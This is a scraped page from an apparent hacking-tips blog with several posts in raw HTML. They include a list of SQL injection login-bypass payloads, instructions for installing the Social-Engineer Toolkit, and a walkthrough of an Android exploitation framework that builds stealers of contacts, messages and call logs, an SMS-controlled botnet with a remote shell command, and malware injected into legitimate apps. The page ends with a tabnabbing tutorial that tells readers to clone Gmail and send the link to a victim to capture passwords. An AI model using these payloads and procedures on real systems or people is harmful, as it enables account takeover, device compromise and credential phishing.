Bitstream Charter, serif;"><span style="font-size: medium;">admin') or '1'='1'--</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">admin') or '1'='1'#</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">admin') or '1'='1'/*</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">admin" --</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">admin" #</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">admin"/*</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">admin" or "1"="1</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">admin" or "1"="1"--</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">admin" or "1"="1"#</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">admin" or "1"="1"/*</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">admin"or 1=1 or ""="</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">admin" or 1=1</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">admin" or 1=1--</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">admin" or 1=1#</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">admin" or 1=1/*</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">admin") or ("1"="1</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">admin") or ("1"="1"--</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">admin") or ("1"="1"#</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">admin") or ("1"="1"/*</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">admin") or "1"="1</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">admin") or "1"="1"--</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">admin") or "1"="1"#</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">admin") or "1"="1"/*</span></span></span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="color: black;"><span style="font-family: Bitstream Charter, serif;"><span style="font-size: medium;">1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055</span></span></span></div><br /><a name='more'></a><br /><br />For detail SQL injection cheat sheet <a href="http://ceh.vn/sql/sql-cheat-sheet/">click here</a></div>

Sql Injection Authentication bypass cheat sheet

This list can be used by Hackers when testing for SQL injection authentication bypass.A Hacker can use it manually or through burp in order ...

+ Read more »

How to move S.E.T. to Github?

<div dir="ltr" style="text-align: left;" trbidi="on">The Social-Engineer Toolkit (SET) and the Artillery open source projects have officially been moved to github. Github provides a much faster platform to getting releases up and a more efficient method for obtaining new releases to SET.<br /><br />All you need to do to go from the current version to git is do an svn update in the set directory and run the automatic installer. SET updates once pulled through github will now be pulled from the github repositories versus svn. The subversion repos will remain active for a couple months.<br /><br /><h3 style="text-align: left;">How to Move S.E.T. to Github ?</h3><div style="text-align: left;"><br /></div><div style="text-align: left;">1. Manual <br /><br />2. Automatic </div><h3 style="text-align: left;">How to Manual install S.E.T.?</h3><div style="text-align: left;">Extra package which is necessary to use SET effectively are as follow.<br /><br />(1)Metasploit:- You can see my old post about how to install metasploit in ubuntu <a href="http://tipstrickshack.blogspot.com/2012/09/how-to-install-metasploit-in-ubuntu.html" target="_blank">here</a>.<br /><br />(2)Ettercap:- If you are on any network & want to attack on network like Man in the Middele Attack or DNS poisoning then you require it.<br /><br />To install Ettercap open terminal in type following command:-<br /><br />sudo apt-get install ettercap<br /><br />(3)Openjdk-6-It`s necessary program to use SET. Just type following command in terminal<br /><br />sudo apt-get install openjdk-6-jdk<br /></div>git clone https://github.com/trustedsec/social-engineer-toolkit.git<br />cd social-engineer-toolkit<br />./setoolkit<br /><br />Whenever you need updates, just run the update tool or type git pull. In addition to the new release to git, the installer has been updated to support OSX installations. This update puts SET at version 4.3.4.<br /><br /><h3 style="text-align: left;">How to install Automatic S.E.T.?</h3><div style="text-align: left;"><br /></div>In this method we assume that you have already install SET , & which use svn , but new version moved to github. <br /><br />cd /pentest/exploits/set<br />svn update<br />./set<br /><br />[-] New set_config.py file generated on: 2013-01-04 10:54:25.898164<br />[-] Verifying configuration update...<br />[*] Update verified, config timestamp is: 2013-01-04 10:54:25.898164<br />[*] SET is using the new config, no need to restart[!] The Social-Engineer Toolkit has officially moved to github and no longer uses SVN.<br />[!] Ensure that you have GIT installed and this conversion tool will automatically pull the latest git version for you.<br />[!] Do you want to do a manual install or have SET do the conversion to GIT for you?<br /><br />1. Automatic<br />2. Manual<br />3. Continue using SET (NO UPDATES ANYMORE!)<br /><br /><br />Enter your numeric choice: 1<br />[*] BEFORE YOU START! Ensure you have GIT installed (apt-get install git)<br />Have you installed GIT? y/n: y<br />[*] Great! Here we go... Removing old svn repository and moving to new<br />[*] SET directory has been removed. Now checking out SET from GIT..<br />[*] This could take a few moments..<br />Cloning into /opt/set...<br />remote: Counting objects: 403, done.<br />remote: Compressing objects: 100% (323/323), done.<br />remote: Total 403 (delta 81), reused 392 (delta 70)<br />Receiving objects: 100% (403/403), 35.81 MiB | 1.45 MiB/s, done.<br />Resolving deltas: 100% (81/81), done.<br />[*] You should now have the latest from git. To update, run set-update or type git pull<br />[*] Exit SET and restart. Move out of the current directory and go into the set directory.<br />[*] You should never have to go through this process again!<br /><br />====How to Update====<br /><br />(You may choose either ./set-update or git pull as advise above.)<br /><br />root@LM:/opt/set# ./set-update<br />[-] Updating the Social-Engineer Toolkit, be patient...<br />Already up-to-date.<br /><br />[*] The updating has finished, returning to main menu..<br />root@LM:/opt/set# git pull<br />Already up-to-date.<br /><br />==== STEP 2====<br /><br />#If you came across this error message :<br /><br />root@LM:/opt/set# ./set<br />[!] Metasploit path not found. These payloads will be disabled.<br />[!] Please configure in the config/set_config.Just Press<br /><br />#Then it will pop-up Terms of service<br /><br />Do you agree to the terms of service [y/n]: y<br /><br />#It will go to the SET Menu and choose "99" to exit SET<br /><br />set>99<br /><br />#Edit config/set_config ( Use nano or vim are up to you )<br /><br />root@LM:/opt/set# nano config/set_config<br /><br />#In config/set_config Editor.Please edit base on your Metasploit directory:-<br /><br />### Define the path to MetaSploit, for example: /pentest/exploits/framework3<br />METASPLOIT_PATH=/opt/metasploit-4.4.0/msf3/#Save and Exit the Editor.Kindly update your Metasploit by choosing no 4 in SET Menu.<br /><br />4) Update the Metasploit Framework<br /><br />set> 4<br /><br />#Once update you may run SET as normal</div>

How to move S.E.T. to Github?

The Social-Engineer Toolkit (SET) and the Artillery open source projects have officially been moved to github. Github provides a much faster...

+ Read more »

Hack Android With Android Exploitation Framework

<div dir="ltr" style="text-align: left;" trbidi="on"><br /><div style="text-align: center;">  <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAfPi_paaAY0U4pKuYUFH7f0qyGTF_nzBWpMWeZjWA6Q7C49i-kTaeoDXIqMffBOGDTbqjfC0jWGQbnBv5_m3GPIugajsHI7EjE8HQmJ_I553u5gtba-WLq_5NxCM2r9cjdMbsi2podAI/s1600/android-hack.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAfPi_paaAY0U4pKuYUFH7f0qyGTF_nzBWpMWeZjWA6Q7C49i-kTaeoDXIqMffBOGDTbqjfC0jWGQbnBv5_m3GPIugajsHI7EjE8HQmJ_I553u5gtba-WLq_5NxCM2r9cjdMbsi2podAI/s320/android-hack.jpg" width="320" /></a></div><i>IMPORTANT NOTE: The below information is for educational and research purposes only and to illustrate how insecure the Android platform is. You would also come to see, how most of the present Android anti-malwares fail to detect threats in the current scenario. Also, infecting other persons computer/mobile devices with a malicious application without his permission is an punishable crime.</i><br /><a name='more'></a>Their exist a lot of tools to exploit the security holes in normal PC environment, but there have been really less tools for the Android environment, which at the same time is expandable. By expandable, i’m trying to say, that the users who use the framework, could build there own modules and share with the security community.<br /><br />Android Framework for Exploitation is an open-source project which we have developed in order to increase mobile security research, check for application based and platform based vulnerabilities, as well as write plugins for the framework and share it with the community. Subho Halder and me (<a href="http://www.facebook.com/aditya1391" rel="nofollow" target="_blank">Aditya Gupta</a>) have developed a framework known as Android Framework for Exploitation, which we released in BlackHat Abu Dhabi in December 2012. The aim of this framework is to help the mobile security community to analyze applications, exploit vulnerabilities, build POCs, and share their own modules with other users.<br /><br />One of the interesting features of this framework is the ability to build malwares, botnets and even inject malwares in existing legitimate applications. This is just to show that how ineffective our current mobile anti malwares are against these type of infected version of legitimate applications, as at the time of writing, none of the anti malwares for Android detected the malware sample.<br /><br /><b>Some of the features which we’ll be looking into this post is :</b><br /><br />1. Creating a malware<br />2. Creating a botnet<br />3. Injecting malicious codes in a legitimate application<br />4. Analyzing vulnerable applications<br /><br />Before we go further, let us have a look at the file structure of AFE.<br />Once you download AFE, you will be having a structure similar to the one given below.<br /><br /><img height="26" src="http://afe-framework.com/blog/afe1.png" width="577" /><br /><br />The Input will be containing all the input apk(s) for any processing, such as crypting the apk to make it undetectable from anti malwares, or inserting the apk in any other legitimate apk or so on.<br /><br /><b>Creating a malware</b><br /><br />AFE gives the users to create malwares for their devices with prebuilt templates. You could also modify the source code of the malware, and modify the GUI of the application apk as you want.<br /><br />To create a malware, first of all you have to launch AFE by typing in ./afe.<br /><br />To get help at any point of time, just type in ? and hit enter.<br /><br /><img height="115" src="http://afe-framework.com/blog/afe2.png" width="577" /><br /><br />Note : This tool is made natively for *nix based systems. If you’re running Windows, you could use it by installing Cygwin. Also make sure you’ve all the dependencies such as Python and the android sdk installed.<br /><br />Once you are inside menu, type in run [the module name] to execute a particular module.<br />In this case, the module is named malware.<br /><br />Once you type in run malware<br /><br />Just type in your local IP address in the Set Reverse IP option. Once you set your reverse IP (same as LHOST), you’ll have the option of Stealer.<br /><br /><img height="371" src="http://afe-framework.com/blog/afe3.png" width="577" /><br /><br />There are 3-predefined stealers, and you can add more yourself. The 3 already existing ones include –<br /><br />• Call Logs<br />• Contacts<br />• Messages<br /><br />Here’s a video of it.<br /><iframe allowfullscreen="allowfullscreen" frameborder="0" height="360" src="http://www.youtube.com/embed/TZ2LNyoAxGM?feature=player_detailpage" width="577"></iframe> <b>Creating a Botnet</b><br />To create a botnet, you have to launch AFE as mentioned earlier. and go on to create a botnet, similar to as we did in the last demo.  Once you’ve created and installed the botnet in any android based smartphone, you could control it by sending SMS from any phone to the infected phone, and getting the response back using SMS itself. Also, this whole process will go on in the background, so the user won’t be able to know if any kind of malicious activity is being performed.<br /><br /><b>Some of the sms based commands are : </b><br /><br /><b>toast: </b> To display a particular message on the screen<br /><b>infect:</b> To spread the botnet to any other device by sending a sms from already infected device<br /><b>browse </b>: automatically open a URL on the victim’s phone<br /><b>shell :</b> The most useful command. Could be used to execute any shell based commands. For <b>example</b>, xysec shell cat /proc/version<br /><br />Note: All the commands should be appended with the keyword ‘xysec’ - this could be changed by modifying the source of the botnet. This is to make sure the SMS which has been send as a command won’t be displayed in the notification of the victim.<br /><br /><b>Analyzing Application for Leaking Content Providers</b><br /><br />One of the most important components of Android applications while working with application data is Content Providers.<br /><br />To get the content providers of the application, you could either reverse the application manually, or look for the content providers, or you could use tool such as Apktool, and parse information based on the filter of content://<br /><br />To find content providers with the help of AFE, you need to place the application you want to analyse in the Input folder.<br /><br /><img height="86" src="http://afe-framework.com/blog/afe4.png" width="577" /><br /><br />Once we select the application, it will automatically present us with the list of content providers present in the application.<br /><br /><img height="288" src="http://afe-framework.com/blog/afe5.png" width="577" /><br /><br />After finding out the permission of the content providers, and if it is set as exported without any permission checking, the application is vulnerable to leaking content providers vulnerability.<br /><br />To make a POC of this vulnerability, we could use the content provider (vulnerable one) and make another application parsing this content provider. Following is a sample code snippet we made:<br /><br /><img b="b" content:="content:" height="500" notes="notes" src="http://afe-framework.com/blog/afe6.png" vulnapplication.content.provider="vulnapplication.content.provider" width="577 /><br /> We are accessing the Vulnerable application’s data using its content provider.<br /> <br /> <b>Uri.parse(" /><br /><br />We would in further update the Github repo located at https://github.com/xysec/AFE/ to make POCs automatically.<br /><iframe allowfullscreen="allowfullscreen" frameborder="0" height="360" src="http://www.youtube.com/embed/eoe7_LhaIO0?feature=player_detailpage" width="577"></iframe> <b>Injecting malicious codes in legitimate application</b><br /><br /><br />Using AFE, you could inject malicious codes in legitimate applications. This is to demonstrate how easy it is for malware authors to create infected version of the legitimate applications, and how anti-malwares should improve their detection strategy to distinguish between fake and legitimate applications.<br /><br /><b>To create the application:</b><br /><br /><ul style="text-align: left;"><li>Select the malware to be injected,</li><li>Choose the target apk</li><li>Type inject</li></ul><br /><img height="257" src="http://afe-framework.com/blog/afe7.png" width="577" /><br /><br />Once we select our target application, it will inject all the services and permissions from our malware (which we have already created) and even sign the newly create application with our key.<br /><br /><img height="406" src="http://afe-framework.com/blog/afe8.png" width="577" /><br /><br />The newly created file will be stored in /Output as the name of [originalapp].apk and [originalapp]_signed.apk.<br /><br /><img height="358" src="http://afe-framework.com/blog/afe9.png" width="577" /><br /><iframe allowfullscreen="allowfullscreen" frameborder="0" height="360" src="http://www.youtube.com/embed/7kvY50QuOpE?feature=player_detailpage" width="577"></iframe> <b>Creating Plugins for AFE</b><br /><br />AFE is an extendable framework, which could be integrated with user made plugins.<br /><br />To create a plugin, you need to go to the modules directory and create a directory with the name of your plugin name.<br /><br />Let us take an example of a plugin named as DB Stealer. This plugin, grabs all the database files (.db) from the device or emulator, and saves it on the system. The code for this plugin has been written in PHP.<br /><br /><img height="40" src="http://afe-framework.com/blog/afe10.png" width="577" /><br /><br />There are 3 necessary files :<br /><br />Run.sh<br />dbstealer.php<br />dbstealer.info<br /><br />Run.sh is the initializing code, which will load up the entire code (written in any language, in this case php), and will execute it.<br /><br />The second file, dbstealer.php is the main code of the plugin. It is loaded from run.sh with the code php dbstealer.php.<br /><br /><img height="496" src="http://afe-framework.com/blog/afe11.png" width="577" /><br /><br /><br />The third file dbstealer.info will contain the information about the plugin, which will be displayed when the user will type in info dbstealer from the afe prompt.<br /><br /><img height="94" src="http://afe-framework.com/blog/afe12.png" width="577" /><br /><br />Hope you guys enjoyed the post. Feel free to mail us at <b>security@xysec.com</b> for any bug issues/suggestions/trainings/ideas!<br /><div><br /></div></div>

Hack Android With Android Exploitation Framework

   IMPORTANT NOTE: The below information is for educational and research purposes only and to illustrate how insecure the Android platform i...

+ Read more »

Tabnabbing Tutorial

<div dir="ltr" style="text-align: left;" trbidi="on">Tabnabbing is a computer exploit and phishing attack, which persuades users to submit their login details and passwords to popular websites by impersonating those sites and convincing the user that the site is genuine.The attack takes advantage of user trust and inattention to detail in regard to tabs, and the ability of modern web pages to rewrite tabs and their contents a long time after the page is loaded. Tabnabbing operates in reverse of most phishing attacks in that it doesn’t ask users to click on an obfuscated link but instead loads a fake page in one of the open tabs in your browser<br /><br />We cover two methods of tabnabbing.<br /><br />(1)Manual.<br /><br />(2)With the help of S.E.T.<br /><br />Tab-nabbing with help of S.E.T?<br /><br />(1)Open S.E.T.(<a href="http://tipstrickshack.blogspot.com/2012/12/how-to-install-social-engineering.html" target="_blank">you can find how to install & configure set here?</a>)<br /><br />(2)Select option 1 which is Social-Engineering Attacks.<br /><br />(3)Select option 2 which is Website Attack Vectors.<br /><br />(4)Now option-4 which is tabnabbing attack method<br /><br />(5)Select site cloner.<br /><br />(6)Enter URL OF site. (For example if you want to hack gmail account of victim ,then type gmail.com.)<br /><br />(7)Send link of your I.P. To victim via mail or chat.(<a href="http://tipstrickshack.blogspot.com/2012/12/how-to-install-configure-send-mail-in.html" target="_blank">You can also spoofemail. See here.</a>)<br /><br />(8)As soon as he open tab , he found message that “please wait while site is loading.”<br /><br />(9)when victim change tab, it redirect him to your phishing page.<br /><br />In next tutorial we will see manual method of tab-nabbing. Because if you have dynamic I.p than this method is not so useful, because as soon as your I.p. Change , listener of S.E.T. Is stopped. So you cannot get password of victim.<br /></div>

Tabnabbing Tutorial

Tabnabbing is a computer exploit and phishing attack, which persuades users to submit their login details and passwords to popular websites ...

+ Read more »